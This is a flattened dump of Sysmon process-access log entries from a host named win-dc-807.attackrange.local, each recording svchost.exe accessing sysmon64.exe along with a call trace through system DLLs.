15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001362Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001361Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001360Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001359Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001358Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001357Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001356Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001355Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.909{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001354Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001353Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001352Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001351Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001350Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001349Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001348Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001347Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001346Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001345Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001344Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001343Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001342Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001341Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001340Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001339Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 